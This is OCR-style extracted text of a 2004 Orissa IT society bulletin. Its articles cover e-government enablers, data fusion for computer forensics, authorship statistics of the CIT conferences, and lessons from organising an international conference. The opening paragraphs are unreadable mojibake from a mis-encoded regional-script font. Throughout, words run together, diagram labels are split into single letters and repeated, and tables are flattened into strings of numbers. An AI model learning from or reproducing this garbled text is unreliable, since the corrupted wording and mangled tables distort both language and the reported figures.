$frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 17: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

13

that is Use of ICT by the Government to providebetter Citizens Centric Services and Applicationthrough performance measurement based onchange management in internal organisationaltransformation set-up that is called e-Government

In other words e-Governance should belinked with the empowerment of everystakeholder along with the economicdevelopment of the country

There are other major issues too Ananalysis of the determinants of successful e-Government programmes shows that the keyfactors are the countries political will thestrength of their human capital theirtelecommunications infrastructure and thepresence of administrative priorities

The United Nations Report develops andpresents a synthetic e-Government index thatreflects and incorporates the countries officialonline presence evaluates theirtelecommunications infrastructure and assessestheir human development capacity In essencethe index reflects the requisite conditions that

constitute an enabling environment for e-Government

Multidimensional approach should beapplied for this kind of initiative that leads toreforms issues e-Government is considered aglobal change programme towards a custom-oriented governmental organisation Atransition of this importance needs clear visionand leadership A recent study on benchmarkingon e-Government projects done by CGEampY hasshown that different kind of e-Governmentprojects in the EU have been translated intomodels with important enablers for the furtherdevelopment of e-Government

These enablers are clustered into thefollowing categories

middot Leadershipmiddot Organisationmiddot Culturemiddot TechnologyA successful e-Government strategy should

contain all elements of the model in a balancedway

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

TECHNOLOGYTECHNOLOGY

OR

GA

NIS

AT

ION

OR

GA

NIS

AT

ION

LEADERSHIPLEADERSHIP

CU

LT

UR

EC

UL

TU

RE

eEgovernment

Vision Commitment Policy

Security Connectivity Infrastructure

Process Management Skills

Customer orientation Communication Partnership

OITS-2004

14

Enablers for Further e-GovernmentDevelopment

What kind of citizens services are neededmust first be analysed by the government so thataccording to requirements the governmentprovides services at minimum cost with nohassle through proper use of ICT This is thefirst step of e-Governance Government shouldstart performance-based change management inthe internal system for better efficiency andreliability to provide much-needed e-Government services in a manner that isaccountable Goals should be defined first andpriorities should be taken in account

Basic citizens services are considered firstbefore any e-Governance initiative and these canbe centralised with the department and availableonline for citizens and business peopleCitizens BusinessesIncome Taxes Social Contribution

for EmployeesJob Search Corporate TaxSocial Security Benefits VATPersonal Documents Registration of a New

CompanyCar Registration Submission of Data to the

Statistical OfficeApplication for Building Custom DeclarationPermission Declaration to Police Environment-related

PermitsPublic Libraries Public ProcurementBirth and MarriageCertificates Enrolment in HigherEducationAnnouncement of Moving Health-related Services

Sources CAP GEMINI Ernst amp Youngs Onlineavailability of public services Oct 2001Oct 2002

The recent study report by PACIFICCOUNCIL ON INTERNATIONAL POLICYRoadmap for E-Government in the DevelopingWorld has shown that the spread of informationand communication technology brings hope that

the government can transform And indeedforward-looking officials everywhere are usingtechnology to improve their governments workefficiency To recapitulate defined broadly e-Government is the use of ICT to promote moreefficient and effective government facilitate moreaccessible government services allow greaterpublic access to information and makegovernment more accountable to citizens E-Government might involve delivering servicesvia the Internet telephone community centres(self-service or facilitated by others) wirelessdevices or other communications systems

But e-Government is not a shortcut toeconomic development budget savings or cleanefficient government

E-Government is not the Big Bang asingle event that immediately and forever altersthe universe of government

E-Government is a process call it e-volution and often a struggle that presentscosts and risks both financial and political

These risks can be significant If not wellconceived and implemented e-Governmentinitiatives can waste resources fail in theirpromise to deliver useful services and thusincrease public frustration with governmentParticularly in the developing world whereresources are scarce e-Government must targetareas with high chances for success and producewinners

Moreover e-Government in the developingworld must accommodate certain uniqueconditions needs and obstacles These mayinclude a continuing oral tradition lack ofinfrastructure corruption weak educationalsystems and unequal access to technology Toooften the lack of resources and technology iscompounded by a lack of access to expertise andinformation

OITS-2004

15

E-Government success requires changinghow government works how it deals withinformation how officials view their jobs andinteract with the public Achieving e-Government success also requires activepartnerships between government citizens andthe private sector The e-Government processneeds continuous input and feedback from thecustomers the public businesses andofficials who use e-Government services Theirvoices and ideas are essential for making e-Government work When implemented well e-Government is a participatory process

The study group also classified tenremarkable questions for e-Governmentinitiatives in the developing world and if wedefine the entire question in a proper way wewould understand basic problems in e-Government implementation and how we canachieve faster growth in areas of e-Governmentby selecting the right citizen centric services

1 Why are we pursuing e-Government2 Do we have a clear vision and priorities

for e-Government3 What kind of e-Government are we ready

for4 Is there enough political will to lead the

e-Government effort5 Are we selecting e-Government projects

in the best way6 How should we plan and manage e-

Government projects7 How will we overcome resistance from

within the government8 How will we measure and communicate

progress And how will we know if weare failing

9 What should our relationship be with theprivate sector

10 How can e-Government improve citizensparticipation in public affairs

These questions itself give a betterunderstanding and if we define it practicallyaccording to the e-Government project then wecan be champions in e-Government

Above all the government should make aperformance-based index for their humanresources so that in a changed environment thegovernment can measure the performance ofofficersemployees and give them rewardsincentives and promotions on betterperformance Simultaneously the governmentwill also give proper training for a new ITenvironment and new IT solutions for betterservices delivered with KnowledgeManagement Unless and until these criteria arenot used by Government Citizens cant get on-time government services either online or offline

Therefore the government should rethinkand link these management tools in e-governanceenvironment to change the old mindset ofemployees (officials) because technology cantdo everything alone People need transformationin the government as well as the thinking of theperformer who performs the role in the e-Governance initiative Indeed e-Governmentmeans transformation of the government processthrough a series of measurements by applyingnew kinds of methodology and sharing the bestpractices along with knowledge and ideas inthe ICT environment That is the only way torealise our dreams

Raj Kumar Prasad is the Editor of Indian firste-commerce and CEO The Indian Chapter of theCommonwealth Centre for e-Governance and regularspeaker on e-governance and e-commerce worldwide anda thinker for social reform through ICT He is also memberof many world organisations and editorial member of manyInternational journals author can be reached atrajkumarelectronicgovindianet

OITS-2004

16

1 INTRODUCTION

We live in the Information Age and weare consumed by information With the rapiddevelopment of this Digital Information andCommunication Technology (DICT) and theability to conduct business and communicatethrough these revolutionary mediums haspositively impacted upon the social andeconomic well being of the Nation invadingnearly every area of modern life The currentstate-of-the-art of different security systems isrelatively primitive with respect to the recentexplosion in computer communicationscyberspace and electronic commerceOrganizations fully realize that cyberspace is acomplex realm of vital information flows withboth enabling and inhibiting technical factors

APPLICATION OF DATA FUSION IN COMPUTERFORENSICS

Sateesh Pradhan1 amp Suneeta Satpathy2

1 Research Fellow Directorate of Forensic Sciences GEQD Hyd2 Dept of Computer Science and Application Utkal University Bhubaneswar

Since Internet-related legislation is not yetmature and the infrastructure of information andcommunication society is still underconstruction there is always a space for illegalopportunists to commit crime which iscommonly known as Computer Frauds andCyber Crime (CFCC) While information isempowerment the sheer magnitude of theinformation we collect as well as the sensitivityof much of it necessitates that we be cautious inits maintenance storage and protectionIdentifying tracking classifying and assessinghostile and inhibiting activities in this ever-growing complex dimension is an enormous andfascinating technical challenge This is a problemthat has put a major impact in whole worldwideweb in the developed and developing countries

ABSTRACTIn the current age of Digital Information and Communication Technology (DICT) the potential for crushing

availability of data largely without meaning has become a reality Business has become increasingly dependenton the Internet and computing to operate Everywhere the individuals and the organizations are drowning in dataand information and starved for knowledge and understanding This problem has put a major impact worldwidein all the developed and developing countries One of the keys to solve this problem is Data and InformationFusion Data Fusion systems are being proposed for a wide variety of applications around the world by whichmore efficient and cost effective systems can be developed The desire to obtain the maximum benefit fromexpensive sensors and information systems has prompted this interest But the Legal support criminal justicedelivery system and international cooperation have not kept pace with the technological advancements which have takenplace with the advent of information technology Also it has become apparent that there are issues of evidencegathering in a computing environment which by their nature is technical and different to other forms of evidencegathering This paper provides a functional overview of the art and science of multisensor Data Fusion technologyand how it can enhance the performance and reliability of Advanced Security Management Systems and ComputerForensics (CF) and hence extend a further hand to the Law Enforcement and Forensic Investigating Agencies

Keywords Digital Information Technology (DICT) Data Fusion Information Fusion Computer Forensics (CF)Potential Legal Digital Evidence (PLDE)

OITS-2004

17

One of the keys to solve this problem is Dataand Information Fusion The techniques of DataFusion are designed to provide information ofa higher quality than could be obtained by usinga set of sensors independently The no of factorsthat allow the integration of data to be beneficialare

1 Redundancy2 Complementarities3 Timeliness4 Cost of the information

So the Law-Enforcement Agencies has aclear role to protect the informationinfrastructure which is critical to nationalsecurity and protect the public from criminal ormalicious activity occurring through theseelectronic mediums By explaining the nature ofthe vulnerabilities faced by the organizationstoday and discussing the problems this paperoffers an introduction to some of the technicalissues surrounding this new and specializedfield of Data Fusion and its application inComputer Forensics to identify and describesources of evidence to help the Law Enforcementand Forensic Investigating Agencies

2 ELEMENTS AND OBJECTIVES OFCOMPUTER FORENSICS

Computer forensics is the study ofcomputers and networks as they relate to legalprocesses The objective of Computer Forensicsis to learn about computer systems and networksand the information they contain and to do itin such a way that the knowledge can be usedin legal proceedings It is defined as anapplication of computer investigations andanalysis techniques in the interests ofdetermining Potential Legal Digital Evidence

Computer specialists can draw on an arrayof methods for discovering deleted

encrypted or damaged file information(Robbins 1997)

There are four steps in ComputerForensics [3]

1 Identify the evidence2 Preserve the evidence3 Analyze the evidence4 Present the evidence

Objective

1 Recovery Evidence preservation Damage control System restoration

2 Causation (Problem source)3 Proof Evidence Analysis Prove it to prevent future incidents

The tools and processes used in thecollection preservation and analysis ofComputer Forensics evidences are different foreach situation and computer system or network

3 DATA FUSION

Data Fusion is the process of combininginformation from a variety of sensors to producea unified result It can also be defined as a processof combining complementary information frommultiple sensor data to generate a single datathat contains a more accurate description of thescene than any of the individual source dataThe purpose is to merge the data coming fromdifferent information sources and the motivationis to provide information about a scene notobtainable from a single source or to reduce theuncertainty associated with data coming fromsingle source The fusion process ideallygenerates a single composite data that representsall the useful information from a set of data of

OITS-2004

18

different sensors thus removing the problemsinherent in frame-by-frame evaluation andimproves the data interpretation and recognitionby taking advantage of the complementarycharacteristics of different sensors

31 Advantages of Data fusionThe advantages gained through the

synergistic use of multisensory information canbe decomposed into a combination of fourfundamental aspects the redundancycomplementarily timeliness and cost of theinformation which can then be defined as thedegree to which each of these four aspects ispresent in the information provided by thesensors It also provides the following potentials

1Information from multiple viewpoints2 Extended coverage3 Improved accuracy4 Robust and fault-tolerant operation

32 Application and Potential opportunities ofData Fusion in Computer Forensics

Application of Data Fusion in variousfields

Data-fusion technology has been appliedmost prominently to military applications suchas battlefield surveillance and tactical situationassessment Data fusion has also emerged incommercial applications such as roboticsmanufacturing medical diagnosis and remotesensing [11 13 14] In a typical militarycommand and control (C2) system data fusionsensors are used to observe electromagneticradiation acoustic and thermal energy nuclearparticles infrared radiation noise and othersignals [12] In cyberspace security systems thesensors are different because the environmentaldimension is different Instead of a missilelaunch and supersonic transport through theatmosphere cyberspace sensors observeinformation flowing in networks However justas C2 commanders are interested in the originvelocity threat and targets of a warhead thesecurity personnels are interested in the identityrate of attacks threats and targets of maliciousintruders and criminals

Sensor 1

Sensor n

Data

Acquisition

Data

Fusion

Feature Extraction and Interpretation

Identify required

data

PROCESS OF DATA FUSION

The fusion process opens a way to reacha better analysis and understanding of the datafrom the viewpoint of accuracy andor reliabilityby providing enhanced information frommultiple sources [1 7 16] When the sensorsprovide information about the same aspect of aspecific entity the redundancy can be used toincrease accuracy and reliability The inherentparallel nature of using the multiple sensorsmeans that these systems usually operate fasterthan a single sensor could One way of accessingthe performance of such type of fusion systemis to measure the enhancement or thedegradation in the information provided by thesystem

Data + Algorithms + Knowledge = Data Fusion

Fusion Techniques

There are various types of fusion techniques

1 Low level fusion2 Medium level fusion3 High level fusion

OITS-2004

19

In CFThe major goal of Computer Forensics is to

develop and apply the scientific methods infinding the solutions driven by practitionerrequirements and addressing the needsconsidering the current paradigms Profilingidentifying tracing and apprehending cybersuspects are the important issues of researchtoday The ultimate goal is to obtain sufficientevidence in order to trace the crime back to thecriminal Within a computer system theanonymity afforded the criminal encouragesdestructive behavior while making it extremelydifficult for Law Enforcers to prove the identityof the criminal Therefore the ability to obtainthe fingerprint of the users is imperative toacquire some hold on identifying the perpetrator

The studies of available Log files alwaysstand as fundamental in evidence collection Butat a higher level it is necessary to possess a morein depth ability to narrow the field or evenestablish a list of possible suspects So the needof the hour is to develop a concept frameworkto assist Law Enforcement and ForensicInvestigating Agencies to gather the digitalevidences against electronic crimes bydeveloping methodology tools technology andprinciples for analysis and examination leadingto PLDE for expert testimony in the Court of Law

Multisensor Data Fusion provides animportant functional framework for buildingAdvanced Security Management systems andcyberspace security awareness A significantchallenge remains for security systems designersto combine the data and information fromnumerous heterogeneous distributed systemsinto a coherent process that can be used toevaluate the security of the cyberspace

Multisensor data-fusion technology is animportant avenue on the road toward the

development of highly reliable security-decisionsystems that identify track and assesscyberspace situations with multiple complexthreats The output of Fusion-based securitysystems will be the estimates of the identity(location) of a threat source the maliciousactivity taxonomy of the threats the attack ratesand an assessment of the potential severity ofthe projected target(s) This information can beused for gathering the Legal Digital Evidence toprovide timely Justice and punish the criminalby efficiently and timely analyzing the cases4 CONCLUSION

There exist significant opportunities andnumerous technical challenges for thecommercial application of Data Fusion theoryinto the art and science of cyberspace securitysystems The data fusion process is in the veryearly stages of technical development Howeveras networks continue to grow and the expandingrealms of cyberspace evolve there will be anurgent need to drive various securitymanagement systems towards next-generationcapabilities Determining the origin of highlysophisticated damage in cyberspace willcontinue to grow in complexity as attackersbecome more cyberspace astute So the futureSecurity systems tracking coordinatedmultifaceted cyberspace attacks require clusteranalysis techniques adaptive neural networksand rule-based knowledge systems

Multisensor Data fusion is a multifacetedengineering approach requiring the integrationof numerous diverse disciplines such asstatistics artificial intelligence signalprocessing pattern recognition cognitive theorydetection theory and decision theory Integratedsensor and decision support tools are emergingrequirements for robust and reliable AdvancedSecurity management systems in complexinternetworks

OITS-2004

20

5 REFERENCES

[1] wwwdatafusionorg

[2] Approaches to improve automation forsecurity Cyber Information Assurance ampDecision Support (CIADS) InformationSystems Laboratory Applied ResearchLaboratories the University of Texas atAustin

[3] Handbook of Computer Crime InvestigationForensic Tools amp Technology by EoghanCasey (Editor) Academic Press 2002

[4] Internet Engineering Task Force NetworkWorking Group Guidelines for the SecureOperation of the Internet RFC1281Available on line ftpinfocertorgpubietfssphwg

[5] Policies to Enhance Computer and NetworkForensics Proceedings of the 2001 IEEEWorkshop on Information Assurance andSecurity United States Military AcademyWest Point NY 5-6 June 2001

[6] Hochberg et al NADIR An automated systemfor detecting network intrusion andmisuse Computers amp Security 1993Elsevier Science New York 235248

[7] D L Hall and J Llinas An introduction toMultisensor data fusion In Proceedingsof the IEEE vol 85 ndeg 1 pp 6-23 1997

[8] L A Klein Sensor and data fusion conceptsand applications Tutorial texts vol TT14 SPIE Optical Engineering Press USA131 p 1993

[9] Waltz E Information Warfare Principles andOperations 1998 Artech House BostonMA

[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

